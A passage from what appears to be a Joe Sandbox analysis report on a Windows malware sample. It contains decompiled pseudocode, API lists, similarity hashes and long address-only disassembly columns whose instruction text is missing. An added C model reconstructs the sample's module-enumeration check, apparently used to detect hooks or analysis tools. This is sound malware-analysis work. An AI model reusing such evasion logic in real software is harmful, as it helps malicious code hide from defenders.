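The two nested while(1) blocks in the decompiled loop above are the compiler's inlined strcmp: two bytes are compared per iteration against szModule of the MODULEENTRY32 the Module32Next call fills in (0x278 + 0x20 = 0x298), and the `sbb eax, eax` / `sbb eax, 0xffffffff` pair after each loop turns the carry flag of the failing compare into -1 or 1. A match (result 0) takes the L10 path, which closes the snapshot handle and returns 0. The C below is an added example, not code from the sample or from the Joe Sandbox report: it models that logic portably so it can be run off a Windows box. The module list and the target strings are constructed; this fragment does not show what E00401650 actually returns, so the target names are hypothetical placeholders.

```c
#include <stdio.h>

/*
 * Added example, not the sample's code. Portable model of the decompiled
 * Module32Next loop: inlined strcmp (two bytes per iteration, cmp/sbb/sbb
 * epilogue) plus the outer "stop if a module name matches" walk.
 */

/* Equivalent of the inlined compare: 0 if equal, -1 if a < b, 1 if a > b,
   comparing bytes as unsigned values exactly like the cmp/sbb sequence. */
int inlined_strcmp(const char *a, const char *b)
{
    unsigned char ca, cb;
    for (;;) {
        ca = (unsigned char)a[0];
        cb = (unsigned char)b[0];
        if (ca != cb)
            break;                  /* first byte of the pair differs */
        if (ca == 0)
            return 0;               /* both ended: equal, the L26/L34 path */
        ca = (unsigned char)a[1];
        cb = (unsigned char)b[1];
        if (ca != cb)
            break;                  /* second byte differs */
        if (ca == 0)
            return 0;
        a += 2;                     /* _t490 + 2 / _t549 + 2 in the listing */
        b += 2;
    }
    /* cmp sets CF when the module byte is below the target byte;
       sbb eax,eax yields -1 or 0, sbb eax,0xffffffff then yields -1 or 1. */
    return ca < cb ? -1 : 1;
}

/*
 * Model of the outer loop: for every module name the snapshot yields, the
 * listing compares szModule against two strings produced by E00401650 (the
 * fragment does not show what they are). A match takes the L10 path,
 * CloseHandle(snapshot); return 0. Returns 1 when that path would be taken,
 * 0 when Module32Next runs out of modules (the L38 path).
 */
int module_check_stops(const char *const *modules, size_t nmodules,
                       const char *const *targets, size_t ntargets)
{
    for (size_t i = 0; i < nmodules; i++) {
        for (size_t j = 0; j < ntargets; j++) {
            if (inlined_strcmp(modules[i], targets[j]) == 0)
                return 1;           /* "goto L10" */
        }
    }
    return 0;
}

/* Constructed input: hypothetical module lists and hypothetical target names,
   not values observed in the sample. */
static const char *const kModulesClean[] = {
    "szDGo5lHdI.exe", "ntdll.dll", "KERNEL32.DLL", "USER32.dll"
};
static const char *const kModulesHooked[] = {
    "szDGo5lHdI.exe", "ntdll.dll", "KERNEL32.DLL", "example_hook.dll"
};
static const char *const kTargets[] = { "example_hook.dll", "example_two.dll" };

#define COUNT(x) (sizeof(x) / sizeof((x)[0]))

int demo_clean(void)
{
    return module_check_stops(kModulesClean, COUNT(kModulesClean),
                              kTargets, COUNT(kTargets));
}

int demo_hooked(void)
{
    return module_check_stops(kModulesHooked, COUNT(kModulesHooked),
                              kTargets, COUNT(kTargets));
}

int main(void)
{
    printf("clean process: stop=%d\n", demo_clean());                   /* 0 */
    printf("example_hook.dll loaded: stop=%d\n", demo_hooked());         /* 1 */
    printf("case-sensitive: %d\n",
           inlined_strcmp("KERNEL32.DLL", "kernel32.dll"));              /* -1 */
    return 0;
}
```

Two things worth noting when reading the real listing against this model: the compare is a byte-exact, case-sensitive strcmp, so whether a module matches depends on the exact casing that ends up in szModule, and the two target strings are whatever E00401650 builds from the stack buffers at +0x60/+0xd4 and +0x14/+0xb4, which is not visible in this fragment.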
[Disassembly listing for 0x004019f0 through 0x00401a92: only the address column is present in this copy of the report]
                                                                                                                                                                                                                                    0x00401a97
                                                                                                                                                                                                                                    0x00401a9c
                                                                                                                                                                                                                                    0x00401aa1
                                                                                                                                                                                                                                    0x00401aa6
                                                                                                                                                                                                                                    0x00401aab
                                                                                                                                                                                                                                    0x00401ab0
                                                                                                                                                                                                                                    0x00401ab9
                                                                                                                                                                                                                                    0x00401aba
                                                                                                                                                                                                                                    0x00401abf
                                                                                                                                                                                                                                    0x00401ac7
                                                                                                                                                                                                                                    0x0040248d
                                                                                                                                                                                                                                    0x0040248d
                                                                                                                                                                                                                                    0x00402496
                                                                                                                                                                                                                                    0x00401acd
                                                                                                                                                                                                                                    0x00401ad6
                                                                                                                                                                                                                                    0x00401ae2
                                                                                                                                                                                                                                    0x00401ae6
                                                                                                                                                                                                                                    0x00401af1
                                                                                                                                                                                                                                    0x00401af6
                                                                                                                                                                                                                                    0x00401afb
                                                                                                                                                                                                                                    0x00401b00
                                                                                                                                                                                                                                    0x00401b05
                                                                                                                                                                                                                                    0x00401b0a
                                                                                                                                                                                                                                    0x00401b0f
                                                                                                                                                                                                                                    0x00401b14
                                                                                                                                                                                                                                    0x00401b19
                                                                                                                                                                                                                                    0x00401b1e
                                                                                                                                                                                                                                    0x00401b23
                                                                                                                                                                                                                                    0x00401b28
                                                                                                                                                                                                                                    0x00401b2d
                                                                                                                                                                                                                                    0x00401b32
                                                                                                                                                                                                                                    0x00401b37
                                                                                                                                                                                                                                    0x00401b3c
                                                                                                                                                                                                                                    0x00401b41
                                                                                                                                                                                                                                    0x00401b46
                                                                                                                                                                                                                                    0x00401b4b
                                                                                                                                                                                                                                    0x00401b50
                                                                                                                                                                                                                                    0x00401b55
                                                                                                                                                                                                                                    0x00401b5a
                                                                                                                                                                                                                                    0x00401b5f
                                                                                                                                                                                                                                    0x00401b64
                                                                                                                                                                                                                                    0x00401b69
                                                                                                                                                                                                                                    0x00401b6e
                                                                                                                                                                                                                                    0x00401b73
                                                                                                                                                                                                                                    0x00401b78
                                                                                                                                                                                                                                    0x00401b7d
                                                                                                                                                                                                                                    0x00401b85
                                                                                                                                                                                                                                    0x00401b8d
                                                                                                                                                                                                                                    0x00401b95
                                                                                                                                                                                                                                    0x00401b9d
                                                                                                                                                                                                                                    0x00401ba4
                                                                                                                                                                                                                                    0x00401ba9
                                                                                                                                                                                                                                    0x00401bae
                                                                                                                                                                                                                                    0x00401bb3
                                                                                                                                                                                                                                    0x00401bb8
                                                                                                                                                                                                                                    0x00401bbd
                                                                                                                                                                                                                                    0x00401bc2
                                                                                                                                                                                                                                    0x00401bc7
                                                                                                                                                                                                                                    0x00401bcc
                                                                                                                                                                                                                                    0x00401bd1
                                                                                                                                                                                                                                    0x00401bd6
                                                                                                                                                                                                                                    0x00401bdb
                                                                                                                                                                                                                                    0x00401be0
                                                                                                                                                                                                                                    0x00401be5
                                                                                                                                                                                                                                    0x00401bea
                                                                                                                                                                                                                                    0x00401bef
                                                                                                                                                                                                                                    0x00401bf4
                                                                                                                                                                                                                                    0x00401bf9
                                                                                                                                                                                                                                    0x00401bfe
                                                                                                                                                                                                                                    0x00401c03
                                                                                                                                                                                                                                    0x00401c08
                                                                                                                                                                                                                                    0x00401c0d
                                                                                                                                                                                                                                    0x00401c12
                                                                                                                                                                                                                                    0x00401c17
                                                                                                                                                                                                                                    0x00401c1c
                                                                                                                                                                                                                                    0x00401c21
                                                                                                                                                                                                                                    0x00401c26
                                                                                                                                                                                                                                    0x00401c2b
                                                                                                                                                                                                                                    0x00401c30
                                                                                                                                                                                                                                    0x00401c35
                                                                                                                                                                                                                                    0x00401c3a
                                                                                                                                                                                                                                    0x00401c3f
                                                                                                                                                                                                                                    0x00401c44
                                                                                                                                                                                                                                    0x00401c48
                                                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                                                    0x00401dc3
                                                                                                                                                                                                                                    0x00401dc4
                                                                                                                                                                                                                                    0x00401de0
                                                                                                                                                                                                                                    0x00401de2
                                                                                                                                                                                                                                    0x00401de7
                                                                                                                                                                                                                                    0x00401dec
                                                                                                                                                                                                                                    0x00401df1
                                                                                                                                                                                                                                    0x00401df6
                                                                                                                                                                                                                                    0x00401dfb
                                                                                                                                                                                                                                    0x00401e00
                                                                                                                                                                                                                                    0x00401e05
                                                                                                                                                                                                                                    0x00401e0a
                                                                                                                                                                                                                                    0x00401e0f
                                                                                                                                                                                                                                    0x00401e14
                                                                                                                                                                                                                                    0x00401e19
                                                                                                                                                                                                                                    0x00401e1e
                                                                                                                                                                                                                                    0x00401e23
                                                                                                                                                                                                                                    0x00401e28
                                                                                                                                                                                                                                    0x00401e2d
                                                                                                                                                                                                                                    0x00401e32
                                                                                                                                                                                                                                    0x00401e37
                                                                                                                                                                                                                                    0x00401e3c
                                                                                                                                                                                                                                    0x00401e41
                                                                                                                                                                                                                                    0x00401e46
                                                                                                                                                                                                                                    0x00401e4b
                                                                                                                                                                                                                                    0x00401e50
                                                                                                                                                                                                                                    0x00401e55
                                                                                                                                                                                                                                    0x00401e5a
                                                                                                                                                                                                                                    0x00401e5f
                                                                                                                                                                                                                                    0x00401e64
                                                                                                                                                                                                                                    0x00401e69
Instruction addresses (column only; the accompanying instruction text is not present on this page):
0x00401e6e, 0x00401e73, 0x00401e78, 0x00401e7d, 0x00401e82, 0x00401e86, 0x00401e8b, 0x00401e96,
0x00401e9a, 0x00401ea4, 0x00401eaf, 0x00401eba, 0x00401ebf, 0x00401ec4, 0x00401ec6, 0x00401ecb,
0x00401ece, 0x00401ed2, 0x00401ed4, 0x00401eef, 0x00401ed6, 0x00401edd, 0x00401ee2, 0x00401ee6,
0x00401ee9, 0x00401ee9, 0x00401ef7, 0x00401efc, 0x00401f02, 0x00401f08, 0x00401f0c, 0x00401f15,
0x00401f18, 0x00401f1a, 0x00401f1c, 0x00401f22, 0x00401f22, 0x00401f24, 0x00401f28, 0x00401f2f,
0x00401f33, 0x00401f33, 0x00401f40, 0x00401f45, 0x00401f4a, 0x00401f4b, 0x00401f50, 0x00401f58,
0x00401f58, 0x00401f58, 0x00401f58, 0x00401f33, 0x00401f63, 0x00401f63, 0x00401f69, 0x00401f72,
0x00401f72, 0x00401f72, 0x00401f73, 0x00401f75, 0x00401f7b, 0x00401f80, 0x00401f81, 0x00401f86,
0x00401f86, 0x00401f8c, 0x00401f8d, 0x00401f8d, 0x00401f9d, 0x00401fa2, 0x00401fa6, 0x00401fac,
0x00401faf, 0x00401fb6, 0x00401fbf, 0x00401fc4, 0x00401fc8, 0x00401fce, 0x00401fd3, 0x00401fe0,
0x00401fec, 0x00401ffe, 0x00402001, 0x00402006, 0x0040200b, 0x00402010, 0x00402015, 0x0040201a,
0x0040201f, 0x00402024, 0x00402029, 0x0040202e, 0x00402033, 0x00402038, 0x0040203d, 0x00402042,
0x00402047, 0x0040204c, 0x00402051, 0x00402056, 0x0040205b, 0x00402060, 0x00402065, 0x0040206a,
0x0040206f, 0x00402074, 0x00402079, 0x0040207e, 0x00402083, 0x00402088, 0x0040208d, 0x00402092,
0x00402097, 0x0040209c, 0x004020a1, 0x004020a5, 0x004020aa, 0x004020ae, 0x004020b4, 0x004020b6,
0x004020bb, 0x004020c0, 0x004020c5, 0x004020ca, 0x004020cf, 0x004020d4, 0x004020e1, 0x004020e6,
0x004020eb, 0x004020f0, 0x004020f5, 0x004020fa, 0x004020ff, 0x00402104, 0x00402109, 0x0040210e,
0x00402113, 0x00402118, 0x0040211d, 0x00402122, 0x00402127, 0x0040212c, 0x00402131, 0x00402136,
0x0040213b, 0x00402140, 0x00402145, 0x0040214a, 0x0040214f, 0x00402154, 0x00402159, 0x0040215e
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x00402167
                                                                                                                                                                                                                                    0x0040216c
                                                                                                                                                                                                                                    0x00402171
                                                                                                                                                                                                                                    0x00402177
                                                                                                                                                                                                                                    0x00402179
                                                                                                                                                                                                                                    0x0040217c
                                                                                                                                                                                                                                    0x0040217e
                                                                                                                                                                                                                                    0x00402183
                                                                                                                                                                                                                                    0x00402188
                                                                                                                                                                                                                                    0x0040218f
                                                                                                                                                                                                                                    0x00402196
                                                                                                                                                                                                                                    0x0040219a
                                                                                                                                                                                                                                    0x0040219e
                                                                                                                                                                                                                                    0x004021a2
                                                                                                                                                                                                                                    0x004021a4
                                                                                                                                                                                                                                    0x004021bc
                                                                                                                                                                                                                                    0x004021be
                                                                                                                                                                                                                                    0x004021c0
                                                                                                                                                                                                                                    0x004021c6
                                                                                                                                                                                                                                    0x004021ca
                                                                                                                                                                                                                                    0x004021e5
                                                                                                                                                                                                                                    0x004021ec
                                                                                                                                                                                                                                    0x004021f1
                                                                                                                                                                                                                                    0x00402213
                                                                                                                                                                                                                                    0x00402215
                                                                                                                                                                                                                                    0x00402217
                                                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                                                    0x00402239
                                                                                                                                                                                                                                    0x0040223b
                                                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                                                    0x00402243
                                                                                                                                                                                                                                    0x0040224d
                                                                                                                                                                                                                                    0x0040224f
                                                                                                                                                                                                                                    0x00402251
                                                                                                                                                                                                                                    0x00402260
                                                                                                                                                                                                                                    0x00402264
                                                                                                                                                                                                                                    0x00402269
                                                                                                                                                                                                                                    0x00402277
                                                                                                                                                                                                                                    0x0040227b
                                                                                                                                                                                                                                    0x00402286
                                                                                                                                                                                                                                    0x00402293
                                                                                                                                                                                                                                    0x004022af
                                                                                                                                                                                                                                    0x004022b1
                                                                                                                                                                                                                                    0x004022b5
                                                                                                                                                                                                                                    0x004022b7
                                                                                                                                                                                                                                    0x004022be
                                                                                                                                                                                                                                    0x004022be
                                                                                                                                                                                                                                    0x004022d7
                                                                                                                                                                                                                                    0x004022e8
                                                                                                                                                                                                                                    0x004022ef
                                                                                                                                                                                                                                    0x004022f6
                                                                                                                                                                                                                                    0x00402300
                                                                                                                                                                                                                                    0x00402304
                                                                                                                                                                                                                                    0x00402308
                                                                                                                                                                                                                                    0x00402315
                                                                                                                                                                                                                                    0x0040231a
                                                                                                                                                                                                                                    0x0040231e
                                                                                                                                                                                                                                    0x00402324
                                                                                                                                                                                                                                    0x00402328
                                                                                                                                                                                                                                    0x0040232a
                                                                                                                                                                                                                                    0x00402331
                                                                                                                                                                                                                                    0x00402331
                                                                                                                                                                                                                                    0x0040234e
                                                                                                                                                                                                                                    0x00402350
                                                                                                                                                                                                                                    0x00402352
                                                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                                                    0x0040235b
                                                                                                                                                                                                                                    0x0040235f
                                                                                                                                                                                                                                    0x00402361
                                                                                                                                                                                                                                    0x00402368
                                                                                                                                                                                                                                    0x00402368
                                                                                                                                                                                                                                    0x0040236d
                                                                                                                                                                                                                                    0x00402371
                                                                                                                                                                                                                                    0x00402373
                                                                                                                                                                                                                                    0x00402375
                                                                                                                                                                                                                                    0x0040237b
                                                                                                                                                                                                                                    0x0040237b
                                                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                                                    0x00402390
                                                                                                                                                                                                                                    0x00402396
                                                                                                                                                                                                                                    0x0040239c
                                                                                                                                                                                                                                    0x004023a0
                                                                                                                                                                                                                                    0x004023a2
                                                                                                                                                                                                                                    0x004023a9
                                                                                                                                                                                                                                    0x004023a9
                                                                                                                                                                                                                                    0x004023ae
                                                                                                                                                                                                                                    0x004023b2
                                                                                                                                                                                                                                    0x004023b4
                                                                                                                                                                                                                                    0x004023ba
                                                                                                                                                                                                                                    0x004023ba
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023b6
                                                                                                                                                                                                                                    0x004023ce
                                                                                                                                                                                                                                    0x004023d1
                                                                                                                                                                                                                                    0x004023d3
                                                                                                                                                                                                                                    0x004023dd
                                                                                                                                                                                                                                    0x004023ec
                                                                                                                                                                                                                                    0x004023ef
                                                                                                                                                                                                                                    0x004023fe
                                                                                                                                                                                                                                    0x00402401
                                                                                                                                                                                                                                    0x00402403
                                                                                                                                                                                                                                    0x00402411
                                                                                                                                                                                                                                    0x00402417
                                                                                                                                                                                                                                    0x00402424
                                                                                                                                                                                                                                    0x00402426
                                                                                                                                                                                                                                    0x0040242a
                                                                                                                                                                                                                                    0x0040242c
                                                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                                                    0x00402434
                                                                                                                                                                                                                                    0x0040243a
                                                                                                                                                                                                                                    0x0040243f
                                                                                                                                                                                                                                    0x00401d95
                                                                                                                                                                                                                                    0x00401d98
                                                                                                                                                                                                                                    0x00401d9a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d9a
                                                                                                                                                                                                                                    0x00401d90
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da5
                                                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401da7
                                                                                                                                                                                                                                    0x00401da0
                                                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401da2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d57
                                                                                                                                                                                                                                    0x00401d50
                                                                                                                                                                                                                                    0x00401d52
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401dad
                                                                                                                                                                                                                                    0x00401db6
                                                                                                                                                                                                                                    0x00401dbb
                                                                                                                                                                                                                                    0x00401dbb
                                                                                                                                                                                                                                    0x00401d10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401d09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401cf7
                                                                                                                                                                                                                                    0x00401cf0
                                                                                                                                                                                                                                    0x00401cf2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c9c
                                                                                                                                                                                                                                    0x00401c9c
                                                                                                                                                                                                                                    0x00401c9d
                                                                                                                                                                                                                                    0x00401caf
                                                                                                                                                                                                                                    0x00401caf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c9a
                                                                                                                                                                                                                                    0x00401c93
                                                                                                                                                                                                                                    0x00401c95
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00401c95
                                                                                                                                                                                                                                    0x00401c4f
                                                                                                                                                                                                                                    0x00000000

APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
• Module32Next.KERNEL32 ref: 00401D02
• Module32Next.KERNEL32 ref: 00401DB6
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: Resource$Module32$CloseFindHandleNextSizeof$ChangeCreateCurrentFirstInitializeLoadLockModuleNotificationProcessSnapshotToolhelp32_getenv_malloc_memset
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPKs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 2366190142-892703413
• Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BF024D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: c46072ac14fadc6c14f4da61cc6c098fcb884d1b5859fc903d461aa0a5fc68b9
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 2B527E74A01229DFDBA4DF58C984BACBBB1BF09304F1484D9E54DA7366DB30AA85CF14
Uniqueness
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 236 4018f0-4018fa 237 401903-40193e lstrlenA call 4017e0 MultiByteToWideChar 236->237 238 4018fc-401900 236->238 241 401940-401949 GetLastError 237->241 242 401996-40199a 237->242 243 40194b-40198c MultiByteToWideChar call 4017e0 MultiByteToWideChar 241->243 244 40198d-40198f 241->244 243->244 244->242 246 401991 call 401030 244->246 246->242
                                                                                                                                                                                                                                    C-Code - Quality: 84%
E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
	void* __ebx;
	void* __ebp;
	signed int _t12;
	char** _t17; /* declaration missing in the decompiler output; holds the __ecx output buffer pointer */
	void* _t21;
	int _t25;
	void* _t30;
	int _t32;
	char* _t35;

	_t21 = __edx;
	_t35 = _a4;
	_t17 = __ecx;
	if(_t35 != 0) {
		_t25 = lstrlenA(_t35) + 1;
		E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
		_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
		asm("sbb esi, esi");
		_t30 =  ~_t12 + 1;
		if(_t30 != 0) {
			_t12 = GetLastError();
			if(_t12 == 0x7a) {
				_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
				E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
				_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
				asm("sbb esi, esi");
				_t30 =  ~_t12 + 1;
			}
			if(_t30 != 0) {
				_t12 = E00401030();
			}
		}
		return _t12;
	} else {
		 *__ecx = _t35;
		return __eax;
	}
}

APIs
• lstrlenA.KERNEL32(?), ref: 00401906
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
• GetLastError.KERNEL32 ref: 00401940
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
• MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLastlstrlen
• String ID:
• API String ID: 3322701435-0
• Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
• Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
• Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 249 40af66-40af6e 250 40af7d-40af88 call 40b84d 249->250 253 40af70-40af7b call 40d2e3 250->253 254 40af8a-40af8b 250->254 253->250 257 40af8c-40af98 253->257 258 40afb3-40afca call 40af49 call 40cd39 257->258 259 40af9a-40afb2 call 40aefc call 40d2bd 257->259 259->258
C-Code - Quality: 63%
                                                                                                                                                                                                                                    			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                                    				signed int _v4;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    
// Decompiler output for the function starting at 0x0040af66. Every symbol it
// calls resolves to LIBCMT in the API list below, so this is statically linked
// C runtime rather than the sample's own logic: the loop retries the allocator
// until it succeeds and, once nothing more can be freed, constructs and throws
// std::bad_alloc (the MSVC operator new pattern). Names such as _t40, _v16 and
// _a4 are the decompiler's placeholders, not recovered symbols.
    _t40 = __edi;
    _t28 = __ebx;
    _t45 = _t51;
    while(1) {
        _t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed; _malloc (API list: ref 0040AF80)
        if(_t14 != 0) {
            break;
        }
        _t15 = E0040D2E3(_a4); // returns 0 when no new-handler could release memory
        __eflags = _t15;
        if(_t15 == 0) {
            __eflags =  *0x423490 & 0x00000001;
            if(( *0x423490 & 0x00000001) == 0) { // one-time init of the static exception object at 0x423484
                 *0x423490 =  *0x423490 | 0x00000001;
                __eflags =  *0x423490;
                E0040AEFC(0x423484); // std::bad_alloc::bad_alloc (API list: ref 0040AFA3)
                E0040D2BD( *0x423490, 0x41a704); // registers its destructor for exit
            }
            E0040AF49( &_v16, 0x423484); // copies the object into the local to be thrown (API list: ref 0040AFB7)
            E0040CD39( &_v16, 0x420fa4); // __CxxThrowException@8 (API list: ref 0040AFC5); does not return
            asm("int3");
            // int3 padding: the per-line address column jumps from 0x0040afd0/0x0040aec2 to
            // 0x0040b6b5 here, so everything below is a second function (a HeapFree wrapper,
            // the shape of the CRT free) that the decompiler appended to this one.
            _t47 = _t45;
            _push(_t47);
            _push(0xc);
            _push(0x420ff8);
            _t19 = E0040E1D8(_t28, _t40, 0x423484); // exception-frame prolog
            _t42 = _v4;
            __eflags = _t42;
            if(_t42 != 0) { // free(NULL) is a no-op
                __eflags =  *0x4250b0 - 3;
                if( *0x4250b0 != 3) { // heap-mode global: anything but 3 goes straight to HeapFree
                    _push(_t42);
                    goto L16;
                } else { // mode 3: look the block up in a small-block heap under a lock
                    E0040D6E0(_t28, 4);
                    _v16 = _v16 & 0x00000000;
                    _t24 = E0040D713(_t42);
                    _v40 = _t24;
                    __eflags = _t24;
                    if(_t24 != 0) {
                        _push(_t42);
                        _push(_t24);
                        E0040D743();
                    }
                    _v16 = 0xfffffffe;
                    _t19 = E0040B70B(); // unlock
                    __eflags = _v40;
                    if(_v40 == 0) { // not a small-block allocation: fall through to HeapFree
                        _push(_v4);
                        L16:
                        __eflags = HeapFree( *0x4234b4, 0, ??); // ??: the decompiler lost the pointer pushed above (_t42 or _v4)
                        if(__eflags == 0) {
                            _t21 = E0040BFC1(__eflags);
                             *_t21 = E0040BF7F(GetLastError()); // map the Win32 error and store it errno-style
                        }
                    }
                }
            }
            return E0040E21D(_t19);
        } else {
            continue;
        }
        L19:
    }
    return _t14;
    goto L19;
}

Instruction addresses for the pseudocode lines above, in source order (the report's per-line address column, flattened by extraction; 0x00000000 entries are lines without an instruction of their own):
0x0040af66 0x0040af66 0x0040af69 0x0040af7d 0x0040af80 0x0040af88 0x00000000 0x00000000
0x0040af73 0x0040af79 0x0040af7b 0x0040af8c 0x0040af98 0x0040af9a 0x0040af9a 0x0040afa3
0x0040afad 0x0040afb2 0x0040afb7 0x0040afc5 0x0040afca 0x0040afd0 0x0040aec2 0x0040b6b5
0x0040b6b7 0x0040b6bc 0x0040b6c1 0x0040b6c4 0x0040b6c6 0x0040b6c8 0x0040b6cf 0x0040b714
0x00000000 0x0040b6d1 0x0040b6d3 0x0040b6d9 0x0040b6de 0x0040b6e4 0x0040b6e7 0x0040b6e9
0x0040b6eb 0x0040b6ec 0x0040b6ed 0x0040b6f3 0x0040b6f4 0x0040b6fb 0x0040b700 0x0040b704
